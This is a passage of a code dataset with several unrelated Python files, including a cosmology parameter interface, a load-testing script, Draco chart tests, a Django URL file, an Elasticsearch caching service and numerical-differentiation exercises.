pinfo in info_params.items():\n # Discard fixed+non-saved parameters\n if is_fixed_param(pinfo) and not is_derived_param(pinfo):\n continue\n info_params_full[p] = info_params[p]\n # Add prior and likelihoods\n priors = [_prior_1d_name] + list(info.get(_prior, []))\n likes = list(info.get(_likelihood))\n # Account for post\n remove = info.get(_post, {}).get(\"remove\", {})\n for param in remove.get(_params, []) or []:\n info_params_full.pop(param, None)\n for like in remove.get(_likelihood, []) or []:\n likes.remove(like)\n for prior in remove.get(_prior, []) or []:\n priors.remove(prior)\n add = info.get(_post, {}).get(\"add\", {})\n # Adding derived params and updating 1d priors\n for param, pinfo in add.get(_params, {}).items():\n pinfo_old = info_params_full.get(param, {})\n pinfo_old.update(pinfo)\n info_params_full[param] = pinfo_old\n likes += list(add.get(_likelihood, []))\n priors += list(add.get(_prior, []))\n # Add the prior and the likelihood as derived parameters\n info_params_full[_minuslogprior] = {_p_label: r\"-\\log\\pi\"}\n for prior in priors:\n info_params_full[_minuslogprior + _separator + prior] = {\n _p_label: r\"-\\log\\pi_\\mathrm{\" + prior.replace(\"_\", r\"\\ \") + r\"}\"}\n info_params_full[_chi2] = {_p_label: r\"\\chi^2\"}\n for like in likes:\n info_params_full[_chi2 + _separator + like] = {\n _p_label: r\"\\chi^2_\\mathrm{\" + like.replace(\"_\", r\"\\ \") + r\"}\"}\n return info_params_full\n\n\ndef get_range(param_info):\n # Sampled\n if is_sampled_param(param_info):\n info_lims = dict([[l, param_info[_prior].get(l)] for l in [\"min\", \"max\", \"loc\", \"scale\"]])\n if info_lims[\"min\"] is not None or info_lims[\"max\"] is not None:\n lims = [param_info[_prior].get(\"min\"), param_info[_prior].get(\"max\")]\n elif info_lims[\"loc\"] is not None or info_lims[\"scale\"] is not None:\n dist = param_info[_prior].pop(_p_dist, \"uniform\")\n pdf_dist = getattr(import_module(\"scipy.stats\", dist), dist)\n lims = pdf_dist.interval(1, **param_info[_prior])\n # Derived\n elif is_derived_param(param_info):\n lims = (lambda i: [i.get(\"min\", -np.inf), i.get(\"max\", np.inf)])(param_info or {})\n # Fixed\n else:\n lims = None\n return lims\n\n\ndef 
is_fixed_param(info_param):\n    \"\"\"\n    Returns True if the parameter has been fixed to a value or through a function.\n    \"\"\"\n    return expand_info_param(info_param).get(_p_value, None) is not None\n\n\ndef is_sampled_param(info_param):\n    \"\"\"\n    Returns True if the parameter has a prior.\n    \"\"\"\n    return _prior in expand_info_param(info_param)\n\n\ndef is_derived_param(info_param):\n    \"\"\"\n    Returns True if the parameter is saved as a derived one.\n    \"\"\"\n    return expand_info_param(info_param).get(_p_derived, False)\n\n\ndef expand_info_param(info_param):\n    \"\"\"\n    Expands the info of a parameter, from the user friendly, shorter format\n    to a more unambiguous one.\n    \"\"\"\n    info_param = deepcopy(info_param)\n    if not hasattr(info_param, \"keys\"):\n        if info_param is None:\n            info_param = odict()\n        else:\n            info_param = odict([[_p_value, info_param]])\n    if all([(f not in info_param) for f in [_prior, _p_value, _p_derived]]):\n        info_param[_p_derived] = True\n    # Dynamical input parameters: save as derived by default\n    value = info_param.get(_p_value, None)\n    if isinstance(value, string_types) or callable(value):\n        info_param[_p_derived] = info_param.get(_p_derived, True)\n    return info_param\n\n\ndef get_sampler_type(filename_or_info):\n    if isinstance(filename_or_info, string_types):\n        from getdist.yaml_tools import yaml_load_file\n        filename_or_info = yaml_load_file(filename_or_info)\n    default_sampler_for_chain_type = \"mcmc\"\n    sampler = list(filename_or_info.get(_sampler, [default_sampler_for_chain_type]))[0]\n    return {\"mcmc\": \"mcmc\", \"polychord\": \"nested\", \"minimize\": \"minimize\"}[sampler]\n\n\ndef get_sample_label(filename_or_info):\n    if isinstance(filename_or_info, string_types):\n        from getdist.yaml_tools import yaml_load_file\n        filename_or_info = yaml_load_file(filename_or_info)\n    return filename_or_info.get(_label, None)\n","repo_name":"mishakb/ISiTGR","sub_path":"python/getdist/cobaya_interface.py","file_name":"cobaya_interface.py","file_ext":"py","file_size_in_byte":5123,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"}
+{"seq_id":"1993983362","text":"# Develop a Python program that simulates a customer call system.\n# The system must allow the user two types of operation:\n# adding a new customer and displaying the customer to be served.\n# These operations can be seen as inserting a new element into a queue and removing an element from a queue.\n\natendimento = []\nwhile True:\n    escolha = input(\"Type N to add a customer, S to quit or P to serve the next customer: \")\n\n    if escolha == \"N\":\n        cliente = input(\"Type the customer's name: \")\n        atendimento.append(cliente)\n\n    elif escolha == \"P\":\n        print(atendimento.pop(0))\n\n    elif escolha == \"S\":\n        break\n\n\n    # TESTING:","repo_name":"Lilarickli/projetos_e","sub_path":"MetOrdEstDados/Implementacao_Fila.py","file_name":"Implementacao_Fila.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"11155308224","text":"#!/usr/bin/env python3\n\nimport sys, os\nfrom time_threads import time_threads\nimport test_setup\nimport time\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport uuid\nimport configparser\nimport datetime\nimport subprocess\nfrom subprocess import Popen, PIPE\n\n\n# Creates test directories if they don't already exist 
\ntest_setup.check()\ntest_setup.clean()\n\n# Get config values\nconfig = configparser.ConfigParser()\nconfig.read('config.cfg')\n\nCAPTURE = config.get('ConfigInfo', 'CAPTURE')\n\n\nclass test_time:\n \"\"\"\n Run pman/pfioh at x requests per second for a given length of time\n \"\"\"\n \n num_threads = []\n success_rate = []\n avg_duration = []\n avg_cpu_util = []\n avg_mem_util = []\n nums = []\n START = 0\n \n # Process name, command, initial number of threads, final number of threads (to scale up to), duration of test\n def __init__(self, pname, cmd, nt, time):\n \"\"\"\n \"\"\"\n \n self.pname = pname # needs to be passed to time_threads for the sake of getting back success status because returned pman & pfioh json responses are slightly different \n self.cmd = cmd\n self.num_threads = nt\n self.time = time * 60 # convert minutes --> seconds\n \n def run(self):\n \"\"\"\n \"\"\"\n \n global num_threads\n global success_rate\n global avg_duration\n global avg_cpu_util\n global avg_mem_util\n global nums\n global START\n \n num_threads = []\n success_rate = []\n avg_duration = []\n avg_cpu_util = []\n avg_mem_util = []\n nums = []\n threads = []\n START = 0\n \n start_time = time.time()\n count = 0\n index = 1\n\n print(\"number of threads is: %s\" % self.num_threads)\n\n if CAPTURE:\n \n # Clear log \n subprocess.call('> /tmp/top.log', shell=True)\n\n # Start logging CPU and memory utilization \n log_cmd = \"pgrep %s\" % self.pname\n process = Popen(log_cmd, stdout=PIPE, stderr=PIPE, shell=True)\n stdout, stderr = process.communicate()\n PID = int(stdout)\n subprocess.call([\"top -p \" + str(PID) + \" -d 0.2 -b | grep --line-buffered \" + self.pname + \" | awk '{print $9, $10; fflush();}' >> /tmp/top.log &\"], shell=True)\n \n # Every second, capture & log information (success rate, average duration, etc.)\n while((time.time() - start_time) < float(self.time)):\n \n duration = 0\n successes = 0\n\n # Measure duration and success of each thread\n for t in threads:\n duration += t.get_duration()\n if t.get_success():\n successes += 1\n\n # Scale up to num_threads\n if len(threads) < self.num_threads:\n\n #######\n temp_cmd = self.cmd.split(\" \")\n temp_cmd[2] += str(index * 100000)\n curr_cmd = \" \".join(temp_cmd)\n index += 1\n #######\n\n curr = time_threads(self.pname, curr_cmd)\n threads.append(curr)\n curr.start()\n\n nums.append(count)\n num_threads.append(len(threads))\n curr_time = time.time()\n\n \n # Calculate duration and success rate\n duration = duration/float(len(threads))\n\n if (duration > 0) and (START == 0):\n START = len(nums)\n \n try:\n successes = (successes/float(len(threads))) * 100\n except: \n successes = 0\n \n # Log calculations\n avg_duration.append(duration)\n success_rate.append(successes)\n\n ############### Print Results ###############\n \n print(\"Duration is: %s\\n\" % str(duration))\n print(\"Success rate is: %d\\n\" % successes)\n\n # Calculate & sleep for the remainder of the second so that the while loop executes once a second\n count += 1\n diff = (curr_time + 1) - time.time()\n time.sleep(diff)\n \n for a in threads:\n a.stop()\n\n for t in threads:\n t.join()\n\n def graph(self):\n \"\"\"\n \"\"\"\n\n global START\n \n dt = datetime.datetime.now()\n r_name = \"test_%s_time_%s_%s.txt\" % (self.pname, str(dt.date()), str(dt.time()))\n results = open(r_name, \"x\")\n \n cpu = []\n mem = 0\n cpu_util = 0\n mem_util = 0\n\n if CAPTURE:\n \n subprocess.call(\"kill -9 $(pgrep top)\", shell=True)\n \n top_count = 0\n \n f = open(\"/tmp/top.log\", 
\"r\")\n for line in f:\n try:\n curr = line.split()\n cpu.append(float(curr[0]))\n mem += float(curr[1])\n top_count += 1\n except:\n continue\n \n f.close()\n \n try:\n cpu_util = max(cpu)\n mem_util = mem/top_count\n avg_cpu_util.append(cpu_util)\n avg_mem_util.append(mem_util)\n \n print(\"CPU is: %s\\n\" % cpu_util)\n print(\"Mem is: %s\\n\" % mem_util)\n \n except:\n pass\n\n dur_sum = 0\n success_sum = 0\n for x in range(START, len(nums)):\n dur_sum += avg_duration[x]\n success_sum += success_rate[x]\n\n dur_sum = dur_sum / len(nums)\n success_sum = success_sum / (len(nums) - START)\n\n print(\"Average duration is: %f\\n\" % dur_sum)\n print(\"Average success rate is: %f\\n\" % success_sum)\n\n results.write(\"CPU utilization is: %s\\n\" % cpu_util)\n results.write(\"Memory utilization is: %s\\n\" % mem_util)\n results.write(\"Average success rate is: %f\\n\" % success_sum)\n results.write(\"Average duration is: %f\\n\" % dur_sum)\n\n results.close()\n \n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax0, ax1, ax2, ax3 = axes.flatten()\n\n #ax0.plot(self.nums, self.cpu)\n #ax1.plot(nums, num_threads)\n ax2.plot(nums, avg_duration)\n ax3.plot(nums, success_rate)\n #ax3.plot(self.nums, self.thr)\n #ax0.set_title('CPU Utilization')\n\n #ax1.set_title('Number of Threads')\n ax2.set_title('Average Duration')\n ax3.set_title('Success Rate')\n\n #ax0.axis([0, self.time, 0, 400]) \n #ax1.axis([0, self.time, 0, 50])\n ax2.axis([0, self.time, 0, 20])\n ax3.axis([0, self.time, 0, 150])\n\n plt.suptitle(\"\" + self.pname + \" | \" + str(self.num_threads) + \" requests/second\" + \" | \" + str(self.time / 60) + \" minutes\")\n\n plt.show()\n\n","repo_name":"FNNDSC/ChRIS-E2E","sub_path":"scale-testing/test_time.py","file_name":"test_time.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39936874518","text":"import csv\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport matplotlib.pyplot as plt\nimport re\nfrom random import randint\n\n\ndef create_plot(name, parameters, window):\n\n fig = plt.figure(figsize=(5, 4), dpi=100)\n plot = fig.add_subplot()\n\n with open(f'results/data_to_plot_{name}.csv', newline='') as csvfile:\n\n data = csv.DictReader(csvfile, delimiter=';')\n values = []\n for row in data:\n float_value = float(row['best_makespan'])\n values.append(float_value)\n\n box_plot_data = values\n plot.boxplot(box_plot_data)\n\n plt.title(parameters, fontsize=10)\n\n # Create a canvas widget from the figure\n canvas = FigureCanvasTkAgg(fig, master=window)\n canvas.draw()\n canvas.get_tk_widget().pack(fill=\"both\", expand=True)\n\n\ndef generate_colors(size):\n colors = []\n for i in range(size):\n colors.append('#%06X' % randint(0, 0xFFFFFF))\n return colors\n\ndef get_max_task_id(tab2d):\n max_id = 0\n for row in tab2d:\n for task_id in row:\n if task_id > max_id:\n max_id = task_id\n return max_id\n\ndef parse_output(name):\n tasks_ret = []\n times_ret = []\n with open(f'results/output_{name}.csv', newline='') as csvfile:\n row_lp = 0\n for row in csvfile:\n row_lp = row_lp + 1\n if row_lp <= 2:\n continue\n\n times_tmp = []\n tasks_tmp = []\n row_splited = row.split(';')\n\n for t in row_splited:\n pair = re.findall(r\"\\d+\\.*\\d*\", t)\n if len(pair) <= 1:\n continue\n tasks_tmp.append(int(pair[0]))\n times_tmp.append(float(pair[1]))\n tasks_ret.append(tasks_tmp)\n times_ret.append(times_tmp)\n return tasks_ret, times_ret\n\ndef sum_columns_on_left(tab):\n ret 
= []\n for row in tab:\n sum_on_left = 0\n new_row = []\n for col in range(len(row)):\n new_row.append(sum_on_left + row[col])\n sum_on_left = sum_on_left + row[col]\n ret.append(new_row)\n return ret\n\ndef max_sum_in_row(tab2d):\n max_val = 0\n for row in tab2d:\n sum_row = 0\n for col in row:\n sum_row = sum_row + col\n if sum_row > max_val:\n max_val = sum_row\n return max_val\n\ndef draw_schedule(name):\n tasks, times = parse_output(name)\n times_cum = sum_columns_on_left(times)\n max_task_id = get_max_task_id(tasks)\n colors = generate_colors(max_task_id + 1)\n\n fig, ax = plt.subplots(figsize=(14, 8), label='Schedule')\n fig.subplots_adjust(left=.05, right=.99, bottom=0.05, top=1)\n ax.invert_yaxis()\n ax.xaxis.set_visible(True)\n ax.set_xlim(0, max_sum_in_row(times))\n\n for row in range(len(times)):\n for j in range(len(times[row])):\n starts = times_cum[row][j] - times[row][j]\n ax.barh('M' + str(row), times[row][j], left=starts, height=0.8, color=colors[tasks[row][j]])\n x_pos = times_cum[row][j] - (times[row][j] / 2)\n ax.text(x_pos, row, tasks[row][j], ha=\"center\", va=\"center\", color=\"black\", size=9 )\n\n fig.show()\n","repo_name":"instant-results/scheduling-parallel-batch-jobs","sub_path":"plot_creating.py","file_name":"plot_creating.py","file_ext":"py","file_size_in_byte":3211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7752307508","text":"import itertools\nfrom typing import Iterable\n\nimport altair as alt\nimport pandas as pd\nimport pytest\n\nfrom draco.debug import (\n ChartConfig,\n DracoDebug,\n DracoDebugChartConfig,\n DracoDebugPlotter,\n)\n\nspecs: dict[str, Iterable[str] | str] = {\n \"tick_plot\": \"\"\"\n attribute(number_rows,root,100).\n entity(field,root,temperature).\n attribute((field,name),temperature,temperature).\n attribute((field,type),temperature,number).\n entity(view,root,0).\n entity(mark,0,1).\n attribute((mark,type),1,tick).\n entity(encoding,1,2).\n attribute((encoding,channel),2,x).\n attribute((encoding,field),2,temperature).\n entity(scale,0,3).\n attribute((scale,channel),3,x).\n attribute((scale,type),3,linear).\n\"\"\",\n \"tick_plot_log\": \"\"\"\n attribute(number_rows,root,100).\n entity(field,root,temperature).\n attribute((field,name),temperature,temperature).\n attribute((field,type),temperature,number).\n entity(view,root,0).\n entity(mark,0,1).\n attribute((mark,type),1,tick).\n entity(encoding,1,2).\n attribute((encoding,channel),2,x).\n attribute((encoding,field),2,temperature).\n entity(scale,0,3).\n attribute((scale,channel),3,x).\n attribute((scale,type),3,log).\n\"\"\",\n}\n\n\ndef test_init():\n # init should work without raising exceptions\n instance = DracoDebug(specs=specs)\n assert type(instance) is DracoDebug\n\n\ndef test_chart_preferences():\n instance = DracoDebug(specs=specs)\n df = instance.chart_preferences\n rows, cols = df.shape\n assert cols == len(\n [\"chart_name\", \"pref_name\", \"pref_description\", \"count\", \"weight\"]\n )\n assert rows == len(instance.specs) * len(instance.feature_names)\n\n\ndef __create_test_data(num_data_rows: int = 10) -> pd.DataFrame:\n return pd.DataFrame(\n data=[(\"x\", \"y\", i, i % 4) for i in range(1, num_data_rows + 1)],\n columns=[\"chart_name\", \"pref_name\", \"count\", \"weight\"],\n )\n\n\n@pytest.mark.parametrize(\n \"config\",\n list(DracoDebugChartConfig),\n)\ndef test_draco_debug_chart_config_by_title(config: DracoDebugChartConfig):\n assert DracoDebugChartConfig.by_title(config.value.title) 
== config\n\n\n@pytest.mark.parametrize(\n \"title\",\n [\"\", \"foo\", \"bar\"],\n)\ndef test_draco_debug_chart_config_by_title_raises_for_unknown_title(title: str):\n with pytest.raises(ValueError):\n DracoDebugChartConfig.by_title(title)\n\n\n@pytest.mark.parametrize(\n \"data\",\n [__create_test_data(0), __create_test_data(5)],\n)\ndef test_plotter_init(data):\n instance = DracoDebugPlotter(chart_preferences=data)\n assert type(instance) is DracoDebugPlotter\n\n\ndef __create_test_debug_plotter(num_data_rows: int = 10) -> DracoDebugPlotter:\n data = __create_test_data(num_data_rows)\n return DracoDebugPlotter(chart_preferences=data)\n\n\n# Running `test_plotter_create_chart` param combinations\n# using data frames with this many rows against each config\n__num_data_row_test_cases = [0, 100, 1000, 10_000]\n\n# Running `test_plotter_create_chart` with these configs\n__chart_config_test_cases = [\n None,\n *list(DracoDebugChartConfig),\n ChartConfig(title=\"Test Title\", sort_x=None, sort_y=None),\n]\n# Produces the `\"instance,config\"` tuples for `@pytest.mark.parametrize`\n__create_chart_test_cases = list(\n itertools.product(\n map(__create_test_debug_plotter, __num_data_row_test_cases),\n __chart_config_test_cases,\n )\n)\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config, violated_prefs_only=False)\n chart_violated_prefs_only = instance.create_chart(\n cfg=config, violated_prefs_only=True\n )\n charts = [chart, chart_violated_prefs_only]\n\n # Expect a vertically concatenated chart made up of two sub-plots in each case\n assert all(type(c) is alt.VConcatChart and len(c.vconcat) == 2 for c in charts)\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_used_data(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n\n # The passed data should be used for visualization\n assert pd.DataFrame.eq(chart.data, instance.chart_preferences).all().all()\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_title(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n\n # Expect that the configured title is used\n if config is not None:\n config = config if isinstance(config, ChartConfig) else config.value\n assert chart.title == config.title\n\n\ndef __mark_as_str(mark: str | alt.MarkDef) -> str:\n if isinstance(mark, str):\n return mark\n else:\n mark_def: alt.MarkDef = mark\n return mark_def.type\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_subplot_marks(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = instance.create_chart(cfg=config)\n weight_bar_chart, pref_rect_chart = chart.vconcat\n\n # Expect the weight chart to use `bar` as its mark\n assert __mark_as_str(weight_bar_chart.mark) == \"bar\"\n # Expect the pref grid chart to use `rect` as its mark\n assert __mark_as_str(pref_rect_chart.mark) == \"rect\"\n\n\n@pytest.mark.parametrize(\n \"instance,config\",\n __create_chart_test_cases,\n)\ndef test_plotter_create_chart_subplot_sorting(\n instance: DracoDebugPlotter, config: ChartConfig | DracoDebugChartConfig\n):\n chart = 
instance.create_chart(cfg=config)\n    weight_bar_chart, pref_rect_chart = chart.vconcat\n\n    # Expect that custom-configured sorting is used\n    if config is not None:\n        config = config if isinstance(config, ChartConfig) else config.value\n        if config.sort_x is not None:\n            assert (\n                weight_bar_chart.encoding.x.__dict__[\"_kwds\"][\"sort\"] == config.sort_x\n            )\n            assert pref_rect_chart.encoding.x.__dict__[\"_kwds\"][\"sort\"] == config.sort_x\n        if config.sort_y is not None:\n            assert pref_rect_chart.encoding.y.__dict__[\"_kwds\"][\"sort\"] == config.sort_y\n","repo_name":"cmudig/draco2","sub_path":"draco/tests/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":6380,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"76"}
+{"seq_id":"74179076084","text":"class User:\n    def __init__(self, requests):\n        self.requests = requests\n\n    async def get_user_by_id(self, tid: str) -> dict:\n        r = await self.requests.get(f'https://teverse.com/api/users/{tid}')\n        return await r.json()\n\n    async def get_user_games(self, tid: str) -> list:\n        r = await self.requests.get(f'https://teverse.com/api/users/{tid}/games')\n        return await r.json()\n","repo_name":"iranathan/teverse.py","sub_path":"teverse/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"26561018845","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom .views import index, client, client_new, info, transaction, vendor, vendordetail, vendortransaction, reminder, expense, invoice, search, paid_by_client, delete_client\nurlpatterns = [\n    path('', auth_views.LoginView.as_view(), name='login'),\n    path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n    path('index/', index, name=\"home\"),\n    path('client/', client, name=\"client\"),\n    path('add/', client_new, name=\"add\"),\n    path('info/<int:pk>/', info, name=\"info\"),\n    path('transaction/', transaction, name=\"transaction\"),\n    path('vendor/', vendor, name=\"vendor\"),\n    path('vendor-detail/<int:pk>/', vendordetail, name=\"vendor-detail\"),\n    path('vendor-transaction/', vendortransaction, name=\"vendor-transaction\"),\n    path('reminder/', reminder, name=\"reminder\"),\n    path('expense/', expense, name=\"expense\"),\n    path('invoice/', invoice, name=\"invoice\"),\n    path('search/', search, name=\"search\"),\n    path('paid_by_client/', paid_by_client, name=\"paid_by_client\"),\n    path('delete/<int:pk>/', delete_client, name=\"delete\"),\n\n]","repo_name":"abi2772/aqua","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"5210903114","text":"from pickle import loads, dumps\nfrom typing import Optional\n\nfrom aioredis import Redis\nfrom elasticsearch import AsyncElasticsearch\nfrom elasticsearch.exceptions import NotFoundError as ES_NotFoundError\nfrom elasticsearch_dsl import Search, Q\n\nfrom models.base import BaseModel\n\nCACHE_EXPIRE_IN_SECONDS = 60 * 5 # 5 minutes\n\n\nclass BaseService:\n\n    def __init__(self, redis: Redis, elastic: AsyncElasticsearch, index: str):\n        self.redis = redis\n        self.elastic = elastic\n        self.index = index\n        self.search_fields = []\n        self.model = BaseModel\n\n    async def get_by_id(self, instance_id: str):\n        \"\"\"Fetch an object by id\"\"\"\n\n        instance = await self._get_from_cache(instance_id)\n        if not 
instance:\n            instance = await self._get_from_elastic(instance_id)\n            if not instance:\n                return None\n            await self._put_to_cache(instance.uuid, instance)\n        return instance\n\n    async def get_list(self, **params):\n        \"\"\"Fetch a list of objects\"\"\"\n\n        redis_key = ':'.join([str(value) for value in params.values()])\n        docs = await self._get_from_cache(redis_key)\n        if not docs:\n            body = self.get_body_query(**params)\n            docs = await self.elastic.search(index=self.index, body=body)\n            if not docs:\n                return []\n            await self._put_to_cache(redis_key, docs)\n        return [self.model(**dict(doc['_source'])) for doc in docs['hits']['hits']]\n\n    async def _get_from_elastic(self, instance_id: str) -> Optional[BaseModel]:\n        try:\n            doc = await self.elastic.get(self.index, instance_id)\n            return self.model(**doc['_source'])\n        except ES_NotFoundError:\n            return\n\n    async def _put_to_cache(self, key, value):\n        await self.redis.set(self.form_redis_key(key), dumps(value), expire=CACHE_EXPIRE_IN_SECONDS)\n\n    async def _get_from_cache(self, key):\n        data = await self.redis.get(self.form_redis_key(key))\n        if data:\n            return loads(data)\n\n    def form_redis_key(self, key):\n        \"\"\"Build the key for redis\"\"\"\n        return f'{self.index}:{str(key)}'\n\n    def get_body_query(self, **params) -> dict:\n        \"\"\"Build the query body for elastic\"\"\"\n\n        _sort = params.get('sort')\n        page_number = params.get('page_number')\n        page_size = params.get('page_size')\n        filter_genre = params.get('filter_genre')\n        query = params.get('query')\n        person_id = params.get('person_id')\n\n        body_query = Search(using=self.elastic, index=self.index)\n        start = (page_number - 1) * page_size\n        if start >= 1000:\n            start = 1000 - page_size\n        body_query = body_query[start: start + page_size]\n\n        if _sort:\n            body_query = body_query.sort(_sort)\n        if query:\n            body_query = body_query.query(\"multi_match\", query=query, fields=self.search_fields)\n        if filter_genre:\n            body_query = body_query.query('nested', path='genre', query=Q(\"match\", genre__uuid=filter_genre))\n        if person_id:\n            body_query = body_query.query(Q('nested', path='actors', query=Q(\"match\", actors__uuid=person_id)) |\n                                          Q('nested', path='directors', query=Q(\"match\", directors__uuid=person_id)) |\n                                          Q('nested', path='writers', query=Q(\"match\", writers__uuid=person_id)))\n        return body_query.to_dict()\n","repo_name":"maxsnegir/AsyncCinema","sub_path":"src/services/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3559,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"}
+{"seq_id":"19110778847","text":"#!/usr/bin/env python3\n\n\ndef main():\n    N, L = map(int, input().split())\n    x = set(map(int, input().split()))\n    T = list(map(int, input().split()))\n    # dp[i]: minimum time to reach distance i\n    INF = 10**18\n    dp = [INF] * (L+4)\n    dp[0] = 0\n    for i in range(L):\n        tmp = dp[i]\n        if i in x: # there is a hurdle here\n            tmp += T[2]\n        # case: action 1\n        dp[i+1] = min(dp[i+1], tmp + T[0])\n        # case: action 2\n        if i+1 == L:\n            dp[i+1] = min(dp[i+1], tmp + T[0]//2 + T[1]//2)\n        dp[i+2] = min(dp[i+2], tmp + T[0] + T[1])\n        # case: action 3\n        if i+2 == L:\n            dp[i+2] = min(dp[i+2], tmp + T[0]//2 + (T[1]*3)//2)\n        elif i+3 == L:\n            dp[i+3] = min(dp[i+3], tmp + T[0]//2 + (T[1]*5)//2)\n        dp[i+4] = min(dp[i+4], tmp + T[0] + T[1]*3)\n    print(dp[L])\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"ryu19-1/atcoder_python","sub_path":"past202005/h/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}
+{"seq_id":"26197855543","text":"from sys import argv as ag\n\ndef addToNumbers (number1, number2):\n print('StartProgram: addTonymbers executed...\\n')\n result = number1+number2\n\n return result\nanswer = False\ndef isEven (aNumber):\n if (aNumber%2==0 ):\n return True\n #print (\"It's even\")\n else: \n return False\n #print (\"It's odd\")\n\nif __name__ == \"__main__\":\n # print ( f' Sum is equal to = {adToNumbers (int(ag[1])),int(ag[2]))}')\n n1 = int (input ('Join first number:\\t'))\n n2 = int (input ('Join second number:\\t'))\n\n # print (f'Sum is equal to = {addToNumbers (n1,n2) }')\n # answer = isEven ( addToNumbers (n1,n2))\n\n #isPrime (n1)\n #isPrime (n2)\n \n\n #if( isEven (addToNumbers (n1,n2) ) ):\n # print (f'N!: {n1} and N2: {n2} are your lucky numbers!')\n #else:\n # print (f'N!: \"{n1}\" and N2: \"{n2}\"\" are your lucky numbers!')\n\n #if(isPrime (n4 )):\n # print (\"n4 is prime\") \n #else: \n #print (\"n4 is not prime\")","repo_name":"GabrielCB1/StructuredProgramming2A","sub_path":"unit2/fuctionIntro.py","file_name":"fuctionIntro.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20390551732","text":"from math import e\r\n\r\na0 = 1\r\na1 = 2\r\na2 = 3\r\n\r\nx_start = 1\r\nx_step = 1\r\nx_amount = 10\r\n\r\n# def f(x):\r\n# return e**x\r\n\r\ndef f(x):\r\n return a0 * x / (a1 + a2 * x)\r\n\r\ndef create_table(start, step, q):\r\n x_tbl = [start + step * i for i in range(q)]\r\n y_tbl = [f(x) for x in x_tbl]\r\n return x_tbl, y_tbl\r\n\r\ndef left_difference(y, h):\r\n ld = [None]\r\n for i in range(1, len(y)):\r\n ld.append((y[i] - y[i-1]) / h)\r\n return ld\r\n\r\ndef central_difference(y, h):\r\n cd = [None]\r\n for i in range(1, len(y)-1):\r\n cd.append((y[i+1] - y[i-1]) / (2 * h))\r\n cd.append(None)\r\n return cd\r\n\r\ndef edges(y, h):\r\n l = len(y)\r\n ed = [None for y in range(l)]\r\n ed[0] = (-3 * y[0] + 4 * y[1] - y[2]) / (2 * h)\r\n ed[l - 1] = (y[l - 3] - 4 * y[l - 2] + 3 * y[l - 1]) / (2 * h)\r\n return ed\r\n\r\ndef runge_left(y, h):\r\n n = len(y)\r\n p = 1\r\n q = 2\r\n yh = left_difference(y, h)\r\n y2h = [0 if i < 2 else (y[i] - y[i-2]) / (2*h) for i in range(0, n)]\r\n\r\n res = [None, None]\r\n for i in range(2, n):\r\n res.append(yh[i] + (yh[i] - y2h[i]) / (q ** p - 1))\r\n return res\r\n\r\ndef leveling_variables(x, y):\r\n # n = 1 / y\r\n # ли = 1 / x\r\n n = len(x)\r\n res = [0] * n\r\n for i in range(n):\r\n if x[i] != 0:\r\n res[i] = (a1 * (y[i] ** 2)) / ((x[i] ** 2) / a0)\r\n else:\r\n res[i] = None\r\n return res\r\n\r\ndef new_align(x, y):\r\n # n = x / y\r\n # ли = x\r\n n = len(x)\r\n res = [0] * n\r\n\r\n for i in range(n):\r\n if x[i] != 0:\r\n res[i] = (a2 / a0) * (y[i] ** 2 / x[i]) * \\\r\n (((a1 + a2 * x[i]) ** 2) / (a0 * (a1 + a2 * x[i]) - a2 * a0 * x[i]))\r\n else:\r\n res[i] = None\r\n\r\n return res\r\n\r\ndef derivative(x):\r\n return (a0 * (a1 + a2 * x) - a2 * a0 * x) / ((a1 + a2 * x) ** 2)\r\n\r\ndef accurate_derivative(x):\r\n ad = []\r\n for i in range(len(x)):\r\n ad.append(derivative(x[i]))\r\n return ad\r\n\r\ndef print_line(name, table):\r\n print(\"{:<20}\".format(name), end=\"\")\r\n for i in table:\r\n if (i != None):\r\n print(\"{: <15.4f}\".format(i), end=\"\")\r\n else:\r\n print(\"{: <15}\".format(\"None\"), end=\"\")\r\n print()\r\n\r\nx_table, y_table = create_table(x_start, x_step, x_amount)\r\nleft_diff = left_difference(y_table, x_step)\r\ncentral_diff = central_difference(y_table, x_step)\r\nedg = 
